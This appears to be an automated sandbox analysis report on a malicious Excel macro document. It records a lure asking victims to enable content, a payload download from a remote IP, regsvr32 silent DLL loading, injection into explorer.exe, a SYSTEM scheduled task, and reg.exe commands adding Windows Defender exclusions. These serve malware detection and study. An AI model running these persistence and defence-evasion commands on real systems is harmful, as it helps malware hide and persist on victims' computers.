    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00094FC0
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.6.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: Claim-680517779-09242021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44463.6668827546[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.6668827546[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.6668827546[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................p. ..........&>.....(.P............................................................................................... .....
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.......N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD567.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-680517779-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{E4A7369A-890C-4248-9B54-92DEDB8F0D3A}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{1D70F813-44FD-4BE1-8C13-D3E897FC24C9}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{38037388-88B6-45C8-AD57-44DA063B263F}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{1D70F813-44FD-4BE1-8C13-D3E897FC24C9}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{E4A7369A-890C-4248-9B54-92DEDB8F0D3A}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{38037388-88B6-45C8-AD57-44DA063B263F}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000A51A FindResourceA,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.516885155.0000000002581000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000004.00000002.516667603.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.518565464.0000000002581000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.574668774.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.582087753.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DA00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DD485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DD4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D9D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D9E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DBB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.6.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: 25102D value: E9 BA 4C E7 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: 25102D value: E9 BA 4C E7 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: 25102D value: E9 BA 4C E3 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: 25102D value: E9 BA 4C E3 FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: Claim-680517779-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2600Thread sleep count: 46 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2032Thread sleep time: -148000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2832Thread sleep count: 50 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 408Thread sleep count: 49 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 668Thread sleep count: 48 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 380Thread sleep count: 49 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 380Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2300Thread sleep count: 53 > 30
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
